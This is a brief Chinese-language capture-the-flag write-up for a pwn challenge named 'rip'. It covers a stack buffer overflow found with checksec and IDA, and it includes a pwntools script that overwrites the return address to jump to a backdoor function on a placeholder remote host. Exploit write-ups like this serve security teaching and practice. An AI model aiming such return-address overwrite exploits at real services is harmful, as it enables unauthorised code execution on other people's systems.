checksec一下,发现啥保护也没开
IDA打开看看,明显的栈溢出漏洞,IDA给出了s的长度为0xf
发现后门函数
脚本中使用地址0x401186发现不行(不知道为什么),换成0x401187发现可以
from pwn import *
from LibcSearcher import *
context.os='linux'
context.arch='amd64'
context.log_level='debug'
sl=lambda x:io.sendline(x)
io=remote('xxx',xxx)
payload='a'*(0xf+8)+p64(0x401187)
sl(payload)
io.interactive()
附件:rip